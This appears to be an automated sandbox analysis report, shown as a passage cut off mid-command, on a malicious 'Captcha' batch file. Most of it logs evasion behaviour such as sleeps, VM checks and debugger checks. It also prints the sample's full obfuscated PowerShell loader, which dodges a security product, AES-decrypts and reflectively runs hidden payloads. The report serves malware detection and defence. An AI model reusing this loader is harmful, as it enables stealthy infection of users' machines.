Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5553 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4288 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 601 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1816 Thread sleep count: 5553 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2132 Thread sleep count: 4288 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5988 Thread sleep time: -13835058055282155s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3060 Thread sleep count: 601 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6068 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7756 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3360 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: svchost.exe, 0000000F.00000002.4064007067.000001DAE9A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4064453261.000001DAEF055000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4063984734.000001DAE9A27000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\captcha_v4id882994ft.bat';$kkoh='gcdbhetcdbhccdbhurcdbhrecdbhntcdbhpcdbhrcdbhocecdbhscdbhs'.replace('cdbh', ''),'trbvjsanbvjssfbvjsorbvjsmfibvjsnabvjslbbvjslobvjsckbvjs'.replace('bvjs', ''),'maijrdinmijrdodijrduijrdle'.replace('ijrd', ''),'epyvrlepyvrmepyvrntpyvrat'.replace('pyvr', ''),'enaikltaiklrypaikloaikliaiklnt'.replace('aikl', ''),'reaubtzdlubtzinubtzes'.replace('ubtz', ''),'chrklaanrklagerklaexrklaterklanrklasirklaon'.replace('rkla', ''),'loucgwaducgw'.replace('ucgw', ''),'cyndvreyndvayndvtyndvedeyndvcyndvryndvypyndvtoyndvryndv'.replace('yndv', ''),'coyevgpyyevgtoyevg'.replace('yevg', ''),'inogkevoogkekeogke'.replace('ogke', ''),'fwztzromwztzbwztzaswztzewztz6wztz4wztzstrwztzinwztzg'.replace('wztz', ''),'siszbpliszbiiszbtiszb'.replace('iszb', ''),'deayoncomayonprayonessayon'.replace('ayon', '');powershell -w hidden;$modules=[system.diagnostics.process]::($kkoh[0])().modules;if ($modules -match 'hmpalert.dll') { exit; };function rubtz($wsnje){$afysz=[system.security.cryptography.aes]::create();$afysz.mode=[system.security.cryptography.ciphermode]::cbc;$afysz.padding=[system.security.cryptography.paddingmode]::pkcs7;$afysz.key=[system.convert]::($kkoh[11])('sinwep/fk7rgqol4+myngailposrns1a+htyg2gc1lk=');$afysz.iv=[system.convert]::($kkoh[11])('yzogdg/vbgileun/jpga4q==');$fqbge=$afysz.($kkoh[8])();$auohi=$fqbge.($kkoh[1])($wsnje,0,$wsnje.length);$fqbge.dispose();$afysz.dispose();$auohi;}function lyexu($wsnje){$psbxz=new-object system.io.memorystream(,$wsnje);$qjwps=new-object system.io.memorystream;$kucrl=new-object system.io.compression.gzipstream($psbxz,[io.compression.compressionmode]::($kkoh[13]));$kucrl.($kkoh[9])($qjwps);$kucrl.dispose();$psbxz.dispose();$qjwps.dispose();$qjwps.toarray();}$cnxbi=[system.io.file]::($kkoh[5])([console]::title);$gbxfr=lyexu (rubtz ([convert]::($kkoh[11])([system.linq.enumerable]::($kkoh[3])($cnxbi, 5).substring(2))));$hwatp=lyexu (rubtz ([convert]::($kkoh[11])([system.linq.enumerable]::($kkoh[3])($cnxbi, 6).substring(2))));[system.reflection.assembly]::($kkoh[7])([byte[]]$hwatp).($kkoh[4]).($kkoh[10])($null,$null);[system.reflection.assembly]::($kkoh[7])([byte[]]$gbxfr).($kkoh[4]).($kkoh[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\captcha_v4id882994ft.bat';$kkoh='gcdbhetcdbhccdbhurcdbhrecdbhntcdbhpcdbhrcdbhocecdbhscdbhs'.replace('cdbh', ''),'trbvjsanbvjssfbvjsorbvjsmfibvjsnabvjslbbvjslobvjsckbvjs'.replace('bvjs', ''),'maijrdinmijrdodijrduijrdle'.replace('ijrd', ''),'epyvrlepyvrmepyvrntpyvrat'.replace('pyvr', ''),'enaikltaiklrypaikloaikliaiklnt'.replace('aikl', ''),'reaubtzdlubtzinubtzes'.replace('ubtz', ''),'chrklaanrklagerklaexrklaterklanrklasirklaon'.replace('rkla', ''),'loucgwaducgw'.replace('ucgw', ''),'cyndvreyndvayndvtyndvedeyndvcyndvryndvypyndvtoyndvryndv'.replace('yndv', ''),'coyevgpyyevgtoyevg'.replace('yevg', ''),'inogkevoogkekeogke'.replace('ogke', ''),'fwztzromwztzbwztzaswztzewztz6wztz4wztzstrwztzinwztzg'.replace('wztz', 